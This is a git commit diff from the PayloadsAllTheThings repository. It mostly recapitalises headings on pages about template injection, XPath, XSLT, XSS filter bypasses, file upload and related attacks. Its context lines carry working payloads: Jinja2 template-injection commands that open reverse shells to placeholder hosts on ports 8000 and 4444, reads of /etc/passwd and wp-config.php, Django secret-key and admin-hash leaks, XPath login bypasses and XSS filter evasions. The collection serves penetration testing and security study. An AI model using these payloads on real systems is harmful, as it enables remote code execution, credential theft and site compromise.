XPATH + XSS + XXE + XSLT

This commit is contained in:
Swissky 2024-11-30 21:14:51 +01:00
parent 8c09568cb2
commit 32d9f7550d
15 changed files with 235 additions and 201 deletions

View File

@ -6,8 +6,8 @@
## Summary ## Summary
* [CQL Injection Limitations](#cql-injection-limitations) * [CQL Injection Limitations](#cql-injection-limitations)
* [Cassandra comment](#cassandra-comment) * [Cassandra Comment](#cassandra-comment)
* [Cassandra - Login Bypass](#cassandra---login-bypass) * [Cassandra Login Bypass](#cassandra-login-bypass)
* [Example #1](#example-1) * [Example #1](#example-1)
* [Example #2](#example-2) * [Example #2](#example-2)
* [References](#references) * [References](#references)
@ -26,14 +26,14 @@
* CQL does not allow subqueries or other nested statements, so a query like `SELECT * FROM table WHERE column=(SELECT column FROM table LIMIT 1);` would be rejected. * CQL does not allow subqueries or other nested statements, so a query like `SELECT * FROM table WHERE column=(SELECT column FROM table LIMIT 1);` would be rejected.
## Cassandra comment ## Cassandra Comment
```sql ```sql
/* Cassandra Comment */ /* Cassandra Comment */
``` ```
## Cassandra - Login Bypass ## Cassandra Login Bypass
### Example #1 ### Example #1

View File

@ -54,7 +54,6 @@
## DB2 Methodology ## DB2 Methodology
| Description | SQL Query | | Description | SQL Query |
| ---------------- | ------------------------------------ | | ---------------- | ------------------------------------ |
| List databases | `SELECT distinct(table_catalog) FROM sysibm.tables` | | List databases | `SELECT distinct(table_catalog) FROM sysibm.tables` |

View File

@ -6,8 +6,8 @@
## Summary ## Summary
- [ASP.NET Razor](#aspnet-razor) - [ASP.NET Razor](#aspnet-razor)
- [ASP.NET Razor - Basic injection](#aspnet-razor---basic-injection) - [ASP.NET Razor - Basic Injection](#aspnet-razor---basic-injection)
- [ASP.NET Razor - Command execution](#aspnet-razor---command-execution) - [ASP.NET Razor - Command Execution](#aspnet-razor---command-execution)
- [References](#references) - [References](#references)
@ -18,13 +18,13 @@
> Razor is a markup syntax that lets you embed server-based code (Visual Basic and C#) into web pages. > Razor is a markup syntax that lets you embed server-based code (Visual Basic and C#) into web pages.
### ASP.NET Razor - Basic injection ### ASP.NET Razor - Basic Injection
```powershell ```powershell
@(1+2) @(1+2)
``` ```
### ASP.NET Razor - Command execution ### ASP.NET Razor - Command Execution
```csharp ```csharp
@{ @{

View File

@ -8,13 +8,13 @@
- [Templating Libraries](#templating-libraries) - [Templating Libraries](#templating-libraries)
- [Smarty](#smarty) - [Smarty](#smarty)
- [Twig](#twig) - [Twig](#twig)
- [Twig - Basic injection](#twig---basic-injection) - [Twig - Basic Injection](#twig---basic-injection)
- [Twig - Template format](#twig---template-format) - [Twig - Template Format](#twig---template-format)
- [Twig - Arbitrary File Reading](#twig---arbitrary-file-reading) - [Twig - Arbitrary File Reading](#twig---arbitrary-file-reading)
- [Twig - Code execution](#twig---code-execution) - [Twig - Code Execution](#twig---code-execution)
- [Latte](#latte) - [Latte](#latte)
- [Latte - Basic injection](#latte---basic-injection) - [Latte - Basic Injection](#latte---basic-injection)
- [Latte - Code execution](#latte---code-execution) - [Latte - Code Execution](#latte---code-execution)
- [patTemplate](#pattemplate) - [patTemplate](#pattemplate)
- [PHPlib](#phplib-and-html_template_phplib) - [PHPlib](#phplib-and-html_template_phplib)
- [Plates](#plates) - [Plates](#plates)
@ -53,7 +53,7 @@
[Official website](https://twig.symfony.com/) [Official website](https://twig.symfony.com/)
> Twig is a modern template engine for PHP. > Twig is a modern template engine for PHP.
### Twig - Basic injection ### Twig - Basic Injection
```python ```python
{{7*7}} {{7*7}}
@ -63,7 +63,7 @@
{{app.request.server.all|join(',')}} {{app.request.server.all|join(',')}}
``` ```
### Twig - Template format ### Twig - Template Format
```python ```python
$output = $twig > render ( $output = $twig > render (
@ -84,7 +84,7 @@ $output = $twig > render (
{{include("wp-config.php")}} {{include("wp-config.php")}}
``` ```
### Twig - Code execution ### Twig - Code Execution
```python ```python
{{self}} {{self}}
@ -118,13 +118,13 @@ email="{{app.request.query.filter(0,0,1024,{'options':'system'})}}"@attacker.tld
## Latte ## Latte
### Latte - Basic injection ### Latte - Basic Injection
```php ```php
{var $X="POC"}{$X} {var $X="POC"}{$X}
``` ```
### Latte - Code execution ### Latte - Code Execution
```php ```php
{php system('nslookup oastify.com')} {php system('nslookup oastify.com')}

View File

@ -7,29 +7,29 @@
- [Templating Libraries](#templating-libraries) - [Templating Libraries](#templating-libraries)
- [Django](#django) - [Django](#django)
- [Django - Basic injection](#django---basic-injection) - [Django - Basic Injection](#django---basic-injection)
- [Django - Cross-site scripting](#django---cross-site-scripting) - [Django - Cross-Site Scripting](#django---cross-site-scripting)
- [Django - Debug information leak](#django---debug-information-leak) - [Django - Debug Information Leak](#django---debug-information-leak)
- [Django - Leaking app's Secret Key](#django---leaking-apps-secret-key) - [Django - Leaking App's Secret Key](#django---leaking-apps-secret-key)
- [Django - Admin Site URL leak](#django---admin-site-url-leak) - [Django - Admin Site URL leak](#django---admin-site-url-leak)
- [Django - Admin username and password hash leak](#django---admin-username-and-password-hash-leak) - [Django - Admin Username and Password Hash Leak](#django---admin-username-and-password-hash-leak)
- [Jinja2](#jinja2) - [Jinja2](#jinja2)
- [Jinja2 - Basic injection](#jinja2---basic-injection) - [Jinja2 - Basic Injection](#jinja2---basic-injection)
- [Jinja2 - Template format](#jinja2---template-format) - [Jinja2 - Template Format](#jinja2---template-format)
- [Jinja2 - Debug Statement](#jinja2---debug-statement) - [Jinja2 - Debug Statement](#jinja2---debug-statement)
- [Jinja2 - Dump all used classes](#jinja2---dump-all-used-classes) - [Jinja2 - Dump All Used Classes](#jinja2---dump-all-used-classes)
- [Jinja2 - Dump all config variables](#jinja2---dump-all-config-variables) - [Jinja2 - Dump All Config Variables](#jinja2---dump-all-config-variables)
- [Jinja2 - Read remote file](#jinja2---read-remote-file) - [Jinja2 - Read Remote File](#jinja2---read-remote-file)
- [Jinja2 - Write into remote file](#jinja2---write-into-remote-file) - [Jinja2 - Write Into Remote File](#jinja2---write-into-remote-file)
- [Jinja2 - Remote Command Execution](#jinja2---remote-command-execution) - [Jinja2 - Remote Command Execution](#jinja2---remote-command-execution)
- [Forcing output on blind RCE](#jinja2---forcing-output-on-blind-rce) - [Forcing Output On Blind RCE](#jinja2---forcing-output-on-blind-rce)
- [Exploit the SSTI by calling os.popen().read()](#exploit-the-ssti-by-calling-ospopenread) - [Exploit The SSTI By Calling os.popen().read()](#exploit-the-ssti-by-calling-ospopenread)
- [Exploit the SSTI by calling subprocess.Popen](#exploit-the-ssti-by-calling-subprocesspopen) - [Exploit The SSTI By Calling subprocess.Popen](#exploit-the-ssti-by-calling-subprocesspopen)
- [Exploit the SSTI by calling Popen without guessing the offset](#exploit-the-ssti-by-calling-popen-without-guessing-the-offset) - [Exploit The SSTI By Calling Popen Without Guessing The Offset](#exploit-the-ssti-by-calling-popen-without-guessing-the-offset)
- [Exploit the SSTI by writing an evil config file.](#exploit-the-ssti-by-writing-an-evil-config-file) - [Exploit The SSTI By Writing an Evil Config File](#exploit-the-ssti-by-writing-an-evil-config-file)
- [Jinja2 - Filter bypass](#jinja2---filter-bypass) - [Jinja2 - Filter Bypass](#jinja2---filter-bypass)
- [Tornado](#tornado) - [Tornado](#tornado)
- [Tornado - Basic injection](#tornado---basic-injection) - [Tornado - Basic Injection](#tornado---basic-injection)
- [Tornado - Remote Command Execution](#tornado---remote-command-execution) - [Tornado - Remote Command Execution](#tornado---remote-command-execution)
- [Mako](#mako) - [Mako](#mako)
- [Mako - Remote Command Execution](#mako---remote-command-execution) - [Mako - Remote Command Execution](#mako---remote-command-execution)
@ -54,7 +54,7 @@
Django template language supports 2 rendering engines by default: Django Templates (DT) and Jinja2. Django Templates is much simpler engine. It does not allow calling of passed object functions and impact of SSTI in DT is often less severe than in Jinja2. Django template language supports 2 rendering engines by default: Django Templates (DT) and Jinja2. Django Templates is much simpler engine. It does not allow calling of passed object functions and impact of SSTI in DT is often less severe than in Jinja2.
### Django - Basic injection ### Django - Basic Injection
```python ```python
{% csrf_token %} # Causes error with Jinja2 {% csrf_token %} # Causes error with Jinja2
@ -63,20 +63,20 @@ ih0vr{{364|add:733}}d121r # Burp Payload -> ih0vr1097d121r
``` ```
### Django - Cross-site scripting ### Django - Cross-Site Scripting
```python ```python
{{ '<script>alert(3)</script>' }} {{ '<script>alert(3)</script>' }}
{{ '<script>alert(3)</script>' | safe }} {{ '<script>alert(3)</script>' | safe }}
``` ```
### Django - Debug information leak ### Django - Debug Information Leak
```python ```python
{% debug %} {% debug %}
``` ```
### Django - Leaking apps Secret Key ### Django - Leaking App's Secret Key
```python ```python
{{ messages.storages.0.signer.key }} {{ messages.storages.0.signer.key }}
@ -89,7 +89,7 @@ ih0vr{{364|add:733}}d121r # Burp Payload -> ih0vr1097d121r
{% include 'admin/base.html' %} {% include 'admin/base.html' %}
``` ```
### Django - Admin username and password hash leak ### Django - Admin Username And Password Hash Leak
``` ```
@ -104,7 +104,7 @@ ih0vr{{364|add:733}}d121r # Burp Payload -> ih0vr1097d121r
[Official website](https://jinja.palletsprojects.com/) [Official website](https://jinja.palletsprojects.com/)
> Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed. > Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed.
### Jinja2 - Basic injection ### Jinja2 - Basic Injection
```python ```python
{{4*4}}[[5*5]] {{4*4}}[[5*5]]
@ -115,7 +115,7 @@ ih0vr{{364|add:733}}d121r # Burp Payload -> ih0vr1097d121r
Jinja2 is used by Python Web Frameworks such as Django or Flask. Jinja2 is used by Python Web Frameworks such as Django or Flask.
The above injections have been tested on a Flask application. The above injections have been tested on a Flask application.
### Jinja2 - Template format ### Jinja2 - Template Format
```python ```python
{% extends "layout.html" %} {% extends "layout.html" %}
@ -139,7 +139,7 @@ If the Debug Extension is enabled, a `{% debug %}` tag will be available to dump
Source: https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement Source: https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement
### Jinja2 - Dump all used classes ### Jinja2 - Dump All Used Classes
```python ```python
{{ [].class.base.subclasses() }} {{ [].class.base.subclasses() }}
@ -153,7 +153,7 @@ Access `__globals__` and `__builtins__`:
{{ self.__init__.__globals__.__builtins__ }} {{ self.__init__.__globals__.__builtins__ }}
``` ```
### Jinja2 - Dump all config variables ### Jinja2 - Dump All Config Variables
```python ```python
{% for key, value in config.iteritems() %} {% for key, value in config.iteritems() %}
@ -162,7 +162,7 @@ Access `__globals__` and `__builtins__`:
{% endfor %} {% endfor %}
``` ```
### Jinja2 - Read remote file ### Jinja2 - Read Remote File
```python ```python
# ''.__class__.__mro__[2].__subclasses__()[40] = File class # ''.__class__.__mro__[2].__subclasses__()[40] = File class
@ -172,7 +172,7 @@ Access `__globals__` and `__builtins__`:
{{ get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read() }} {{ get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read() }}
``` ```
### Jinja2 - Write into remote file ### Jinja2 - Write Into Remote File
```python ```python
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }} {{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }}
@ -186,7 +186,7 @@ Listen for connection
nc -lnvp 8000 nc -lnvp 8000
``` ```
#### Jinja2 - Forcing output on blind RCE #### Jinja2 - Forcing Output On Blind RCE
You can import Flask functions to return an output from the vulnerable page. You can import Flask functions to return an output from the vulnerable page.
@ -203,7 +203,7 @@ def hook(*args, **kwargs):
``` ```
#### Exploit the SSTI by calling os.popen().read() #### Exploit The SSTI By Calling os.popen().read()
```python ```python
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }} {{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}
@ -235,7 +235,7 @@ With [objectwalker](https://github.com/p0dalirius/objectwalker) we can find a pa
Source: https://twitter.com/podalirius_/status/1655970628648697860 Source: https://twitter.com/podalirius_/status/1655970628648697860
#### Exploit the SSTI by calling subprocess.Popen #### Exploit The SSTI By Calling subprocess.Popen
:warning: the number 396 will vary depending of the application. :warning: the number 396 will vary depending of the application.
@ -244,7 +244,7 @@ Source: https://twitter.com/podalirius_/status/1655970628648697860
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}} {{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
``` ```
#### Exploit the SSTI by calling Popen without guessing the offset #### Exploit The SSTI By Calling Popen Without Guessing The Offset
```python ```python
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %} {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
@ -257,7 +257,7 @@ In another GET parameter include a variable named "input" that contains the comm
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%} {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}
``` ```
#### Exploit the SSTI by writing an evil config file. #### Exploit The SSTI By Writing An Evil Config File
```python ```python
# evil config # evil config
@ -270,7 +270,7 @@ In another GET parameter include a variable named "input" that contains the comm
{{ config['RUNCMD']('/bin/bash -c "/bin/bash -i >& /dev/tcp/x.x.x.x/8000 0>&1"',shell=True) }} {{ config['RUNCMD']('/bin/bash -c "/bin/bash -i >& /dev/tcp/x.x.x.x/8000 0>&1"',shell=True) }}
``` ```
### Jinja2 - Filter bypass ### Jinja2 - Filter Bypass
```python ```python
request.__class__ request.__class__
@ -313,7 +313,7 @@ Bypassing most common filters ('.','_','|join','[',']','mro' and 'base') by http
## Tornado ## Tornado
### Tornado - Basic injection ### Tornado - Basic Injection
```py ```py
{{7*7}} {{7*7}}

View File

@ -6,8 +6,8 @@
## Summary ## Summary
* [Loose Comparison](#loose-comparison) * [Loose Comparison](#loose-comparison)
* [True statements](#true-statements) * [True Statements](#true-statements)
* [NULL statements](#null-statements) * [NULL Statements](#null-statements)
* [Loose Comparison](#loose-comparison) * [Loose Comparison](#loose-comparison)
* [Magic Hashes](#magic-hashes) * [Magic Hashes](#magic-hashes)
* [Methodology](#methodology) * [Methodology](#methodology)
@ -22,7 +22,7 @@
- **Loose** comparison: using `== or !=` : both variables have "the same value". - **Loose** comparison: using `== or !=` : both variables have "the same value".
- **Strict** comparison: using `=== or !==` : both variables have "the same type and the same value". - **Strict** comparison: using `=== or !==` : both variables have "the same type and the same value".
### True statements ### True Statements
| Statement | Output | | Statement | Output |
| --------------------------------- |:---------------:| | --------------------------------- |:---------------:|
@ -44,7 +44,7 @@
![LooseTypeComparison](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Type%20Juggling/Images/table_representing_behavior_of_PHP_with_loose_type_comparisons.png?raw=true) ![LooseTypeComparison](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Type%20Juggling/Images/table_representing_behavior_of_PHP_with_loose_type_comparisons.png?raw=true)
Loose Type Comparisons occurs in many languages: Loose Type comparisons occurs in many languages:
* [MariaDB](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/Mariadb) * [MariaDB](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/Mariadb)
* [MySQL](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/Mysql) * [MySQL](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/Mysql)
@ -56,7 +56,7 @@ Loose Type Comparisons occurs in many languages:
* [SQLite](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/SQLite/2.6.0) * [SQLite](https://github.com/Hakumarachi/Loose-Compare-Tables/tree/master/results/SQLite/2.6.0)
### NULL statements ### NULL Statements
| Function | Statement | Output | | Function | Statement | Output |
| -------- | -------------------------- |:---------------:| | -------- | -------------------------- |:---------------:|

View File

@ -7,10 +7,10 @@
* [Tools](#tools) * [Tools](#tools)
* [Methodology](#methodology) * [Methodology](#methodology)
* [Defaults extensions](#defaults-extensions) * [Defaults Extensions](#defaults-extensions)
* [Upload tricks](#upload-tricks) * [Upload Tricks](#upload-tricks)
* [Filename vulnerabilities](#filename-vulnerabilities) * [Filename Vulnerabilities](#filename-vulnerabilities)
* [Picture compression](#picture-compression) * [Picture Compression](#picture-compression)
* [Picture Metadata](#picture-metadata) * [Picture Metadata](#picture-metadata)
* [Configuration Files](#configuration-files) * [Configuration Files](#configuration-files)
* [CVE - ImageMagick](#cve---imagemagick) * [CVE - ImageMagick](#cve---imagemagick)
@ -30,7 +30,7 @@
![file-upload-mindmap.png](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/Upload%20Insecure%20Files/Images/file-upload-mindmap.png?raw=true) ![file-upload-mindmap.png](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/Upload%20Insecure%20Files/Images/file-upload-mindmap.png?raw=true)
### Defaults extensions ### Defaults Extensions
* PHP Server * PHP Server
```powershell ```powershell
@ -64,7 +64,7 @@
* Coldfusion: `.cfm, .cfml, .cfc, .dbm` * Coldfusion: `.cfm, .cfml, .cfc, .dbm`
* Node.js: `.js, .json, .node` * Node.js: `.js, .json, .node`
### Upload tricks ### Upload Tricks
- Use double extensions : `.jpg.php, .png.php5` - Use double extensions : `.jpg.php, .png.php5`
- Use reverse double extension (useful to exploit Apache misconfigurations where anything with extension .php, but not necessarily ending in .php will execute code): `.php.jpg` - Use reverse double extension (useful to exploit Apache misconfigurations where anything with extension .php, but not necessarily ending in .php will execute code): `.php.jpg`
@ -99,7 +99,7 @@
* Shell can also be added in the metadata * Shell can also be added in the metadata
- Using NTFS alternate data stream (ADS) in Windows. In this case, a colon character ":" will be inserted after a forbidden extension and before a permitted one. As a result, an empty file with the forbidden extension will be created on the server (e.g. "`file.asax:.jpg`"). This file might be edited later using other techniques such as using its short filename. The "::$data" pattern can also be used to create non-empty files. Therefore, adding a dot character after this pattern might also be useful to bypass further restrictions (.e.g. "`file.asp::$data.`") - Using NTFS alternate data stream (ADS) in Windows. In this case, a colon character ":" will be inserted after a forbidden extension and before a permitted one. As a result, an empty file with the forbidden extension will be created on the server (e.g. "`file.asax:.jpg`"). This file might be edited later using other techniques such as using its short filename. The "::$data" pattern can also be used to create non-empty files. Therefore, adding a dot character after this pattern might also be useful to bypass further restrictions (.e.g. "`file.asp::$data.`")
### Filename vulnerabilities ### Filename Vulnerabilities
Sometimes the vulnerability is not the upload but how the file is handled after. You might want to upload files with payloads in the filename. Sometimes the vulnerability is not the upload but how the file is handled after. You might want to upload files with payloads in the filename.

View File

@ -33,6 +33,7 @@ Imagine an attacker lures a logged-in victim into accessing `http://www.example.
6. The cache server identifies that the file has a CSS extension. 6. The cache server identifies that the file has a CSS extension.
7. Under the cache directory, the cache server creates a directory named home.php and caches the imposter "CSS" file (non-existent.css) inside it. 7. Under the cache directory, the cache server creates a directory named home.php and caches the imposter "CSS" file (non-existent.css) inside it.
8. When the attacker requests `http://www.example.com/home.php/non-existent.css`, the request is sent to the cache server, and the cache server returns the cached file with the victim's sensitive `home.php` data. 8. When the attacker requests `http://www.example.com/home.php/non-existent.css`, the request is sent to the cache server, and the cache server returns the cached file with the victim's sensitive `home.php` data.
![WCD Demonstration](Images/wcd.jpg) ![WCD Demonstration](Images/wcd.jpg)
@ -88,9 +89,9 @@ Video of the attack by Omer Gil - Web Cache Deception Attack in PayPal Home Page
The following URL format are a good starting point to check for "cache" feature. The following URL format are a good starting point to check for "cache" feature.
* https://example.com/app/conversation/.js?test * `https://example.com/app/conversation/.js?test`
* https://example.com/app/conversation/;.js * `https://example.com/app/conversation/;.js`
* https://example.com/home.php/non-existent.css * `https://example.com/home.php/non-existent.css`
## CloudFlare Caching ## CloudFlare Caching

View File

@ -7,7 +7,7 @@
* [Tools](#tools) * [Tools](#tools)
* [Methodology](#methodology) * [Methodology](#methodology)
* [Blind exploitation](#blind-exploitation) * [Blind Exploitation](#blind-exploitation)
* [Out Of Band Exploitation](#out-of-band-exploitation) * [Out Of Band Exploitation](#out-of-band-exploitation)
* [Labs](#labs) * [Labs](#labs)
* [References](#references) * [References](#references)
@ -23,7 +23,11 @@
## Methodology ## Methodology
Similar to SQL : `"string(//user[name/text()='" +vuln_var1+ "' and password/text()=" +vuln_var1+ "']/account/text())"` Similar to SQL injection, you want to terminate the query properly:
```ps1
string(//user[name/text()='" +vuln_var1+ "' and password/text()='" +vuln_var1+ "']/account/text())
```
```sql ```sql
' or '1'='1 ' or '1'='1
@ -39,9 +43,9 @@ x' or name()='username' or 'x'='y
' and count(/*)=1 and '1'='1 ' and count(/*)=1 and '1'='1
' and count(/@*)=1 and '1'='1 ' and count(/@*)=1 and '1'='1
' and count(/comment())=1 and '1'='1 ' and count(/comment())=1 and '1'='1
search=')] | //user/*[contains(*,' ')] | //user/*[contains(*,'
search=Har') and contains(../password,'c ') and contains(../password,'c
search=Har') and starts-with(../password,'c ') and starts-with(../password,'c
``` ```
### Blind Exploitation ### Blind Exploitation
@ -50,7 +54,8 @@ search=Har') and starts-with(../password,'c
```sql ```sql
and string-length(account)=SIZE_INT and string-length(account)=SIZE_INT
``` ```
2. Extract a character
2. Access a character with `substring`, and verify its value the `codepoints-to-string` function
```sql ```sql
substring(//user[userid=5]/username,2,1)=CHAR_HERE substring(//user[userid=5]/username,2,1)=CHAR_HERE
substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE) substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)

View File

@ -7,11 +7,11 @@
- [Tools](#tools) - [Tools](#tools)
- [Methodology](#methodology) - [Methodology](#methodology)
- [Determine the vendor and version](#determine-the-vendor-and-version) - [Determine the Vendor And Version](#determine-the-vendor-and-version)
- [External Entity](#external-entity) - [External Entity](#external-entity)
- [Read files and SSRF using document](#read-files-and-ssrf-using-document) - [Read Files and SSRF Using Document](#read-files-and-ssrf-using-document)
- [Write files with EXSLT extension](#write-files-with-exslt-extension) - [Write Files with EXSLT Extension](#write-files-with-exslt-extension)
- [Remote Code Execution with PHP wrapper](#remote-code-execution-with-php-wrapper) - [Remote Code Execution with PHP Wrapper](#remote-code-execution-with-php-wrapper)
- [Remote Code Execution with Java](#remote-code-execution-with-java) - [Remote Code Execution with Java](#remote-code-execution-with-java)
- [Remote Code Execution with Native .NET](#remote-code-execution-with-native-net) - [Remote Code Execution with Native .NET](#remote-code-execution-with-native-net)
- [Labs](#labs) - [Labs](#labs)
@ -22,12 +22,10 @@
No known tools currently exist to assist with XSLT exploitation. No known tools currently exist to assist with XSLT exploitation.
* [TODO](#)
## Methodology ## Methodology
### Determine the vendor and version ### Determine the Vendor and Version
```xml ```xml
<?xml version="1.0" encoding="utf-8"?> <?xml version="1.0" encoding="utf-8"?>
@ -51,6 +49,8 @@ No known tools currently exist to assist with XSLT exploitation.
### External Entity ### External Entity
Don't forget to test for XXE when you encounter XSLT files.
```xml ```xml
<?xml version="1.0" encoding="utf-8"?> <?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE dtd_sample[<!ENTITY ext_file SYSTEM "C:\secretfruit.txt">]> <!DOCTYPE dtd_sample[<!ENTITY ext_file SYSTEM "C:\secretfruit.txt">]>
@ -66,7 +66,7 @@ No known tools currently exist to assist with XSLT exploitation.
</xsl:stylesheet> </xsl:stylesheet>
``` ```
### Read files and SSRF using document ### Read Files and SSRF Using Document
```xml ```xml
<?xml version="1.0" encoding="utf-8"?> <?xml version="1.0" encoding="utf-8"?>
@ -86,7 +86,7 @@ No known tools currently exist to assist with XSLT exploitation.
``` ```
### Write files with EXSLT extension ### Write Files with EXSLT Extension
EXSLT, or Extensible Stylesheet Language Transformations, is a set of extensions to the XSLT (Extensible Stylesheet Language Transformations) language. EXSLT, or Extensible Stylesheet Language Transformations, is a set of extensions to the XSLT (Extensible Stylesheet Language Transformations) language. EXSLT, or Extensible Stylesheet Language Transformations, is a set of extensions to the XSLT (Extensible Stylesheet Language Transformations) language. EXSLT, or Extensible Stylesheet Language Transformations, is a set of extensions to the XSLT (Extensible Stylesheet Language Transformations) language.
@ -106,7 +106,7 @@ EXSLT, or Extensible Stylesheet Language Transformations, is a set of extensions
``` ```
### Remote Code Execution with PHP wrapper ### Remote Code Execution with PHP Wrapper
Execute the function `readfile`. Execute the function `readfile`.

View File

@ -2,28 +2,29 @@
## Summary ## Summary
- [Bypass case sensitive](#bypass-case-sensitive) - [Bypass Case Sensitive](#bypass-case-sensitive)
- [Bypass tag blacklist](#bypass-tag-blacklist) - [Bypass Tag Blacklist](#bypass-tag-blacklist)
- [Bypass word blacklist with code evaluation](#bypass-word-blacklist-with-code-evaluation) - [Bypass Word Blacklist with Code Evaluation](#bypass-word-blacklist-with-code-evaluation)
- [Bypass with incomplete html tag](#bypass-with-incomplete-html-tag) - [Bypass with Incomplete HTML Tag](#bypass-with-incomplete-html-tag)
- [Bypass quotes for string](#bypass-quotes-for-string) - [Bypass Quotes for String](#bypass-quotes-for-string)
- [Bypass quotes in script tag](#bypass-quotes-in-script-tag) - [Bypass Quotes in Script Tag](#bypass-quotes-in-script-tag)
- [Bypass quotes in mousedown event](#bypass-quotes-in-mousedown-event) - [Bypass Quotes in Mousedown Event](#bypass-quotes-in-mousedown-event)
- [Bypass dot filter](#bypass-dot-filter) - [Bypass Dot Filter](#bypass-dot-filter)
- [Bypass parenthesis for string](#bypass-parenthesis-for-string) - [Bypass Parenthesis for String](#bypass-parenthesis-for-string)
- [Bypass parenthesis and semi colon](#bypass-parenthesis-and-semi-colon) - [Bypass Parenthesis and Semi Colon](#bypass-parenthesis-and-semi-colon)
- [Bypass onxxxx= blacklist](#bypass-onxxxx-blacklist) - [Bypass onxxxx= Blacklist](#bypass-onxxxx-blacklist)
- [Bypass space filter](#bypass-space-filter) - [Bypass Space Filter](#bypass-space-filter)
- [Bypass email filter](#bypass-email-filter) - [Bypass Email Filter](#bypass-email-filter)
- [Bypass document blacklist](#bypass-document-blacklist) - [Bypass Tel URI Filter](#bypass-tel-uri-filter)
- [Bypass document.cookie blacklist](#bypass-document-cookie-blacklist) - [Bypass document Blacklist](#bypass-document-blacklist)
- [Bypass using javascript inside a string](#bypass-using-javascript-inside-a-string) - [Bypass document.cookie Blacklist](#bypass-document-cookie-blacklist)
- [Bypass using an alternate way to redirect](#bypass-using-an-alternate-way-to-redirect) - [Bypass using Javascript Inside a String](#bypass-using-javascript-inside-a-string)
- [Bypass using an alternate way to execute an alert](#bypass-using-an-alternate-way-to-execute-an-alert) - [Bypass using an Alternate Way to Redirect](#bypass-using-an-alternate-way-to-redirect)
- [Bypass ">" using nothing](#bypass--using-nothing) - [Bypass using an Alternate Way to Execute an Alert](#bypass-using-an-alternate-way-to-execute-an-alert)
- [Bypass ">" using Nothing](#bypass--using-nothing)
- [Bypass "<" and ">" using and ](#bypass--and--using--and-) - [Bypass "<" and ">" using and ](#bypass--and--using--and-)
- [Bypass ";" using another character](#bypass--using-another-character) - [Bypass ";" using Another Character](#bypass--using-another-character)
- [Bypass using missing charset header](#bypass-using-missing-charset-header) - [Bypass using Missing Charset Header](#bypass-using-missing-charset-header)
- [Bypass using HTML encoding](#bypass-using-html-encoding) - [Bypass using HTML encoding](#bypass-using-html-encoding)
- [Bypass using Katakana](#bypass-using-katakana) - [Bypass using Katakana](#bypass-using-katakana)
- [Bypass using Cuneiform](#bypass-using-cuneiform) - [Bypass using Cuneiform](#bypass-using-cuneiform)
@ -36,11 +37,11 @@
- [Bypass using UTF-16be](#bypass-using-utf-16be) - [Bypass using UTF-16be](#bypass-using-utf-16be)
- [Bypass using UTF-32](#bypass-using-utf-32) - [Bypass using UTF-32](#bypass-using-utf-32)
- [Bypass using BOM](#bypass-using-bom) - [Bypass using BOM](#bypass-using-bom)
- [Bypass using jsfuck](#bypass-using-jsfuck) - [Bypass using JSfuck](#bypass-using-jsfuck)
- [References](#references) - [References](#references)
## Bypass case sensitive ## Bypass Case Sensitive
To bypass a case-sensitive XSS filter, you can try mixing uppercase and lowercase letters within the tags or function names. To bypass a case-sensitive XSS filter, you can try mixing uppercase and lowercase letters within the tags or function names.
@ -52,14 +53,14 @@ To bypass a case-sensitive XSS filter, you can try mixing uppercase and lowercas
Since many XSS filters only recognize exact lowercase or uppercase patterns, this can sometimes evade detection by tricking simple case-sensitive filters. Since many XSS filters only recognize exact lowercase or uppercase patterns, this can sometimes evade detection by tricking simple case-sensitive filters.
## Bypass tag blacklist ## Bypass Tag Blacklist
```javascript ```javascript
<script x> <script x>
<script x>alert('XSS')<script y> <script x>alert('XSS')<script y>
``` ```
## Bypass word blacklist with code evaluation ## Bypass Word Blacklist with Code Evaluation
```javascript ```javascript
eval('ale'+'rt(0)'); eval('ale'+'rt(0)');
@ -71,7 +72,7 @@ Set.constructor('ale'+'rt(13)')();
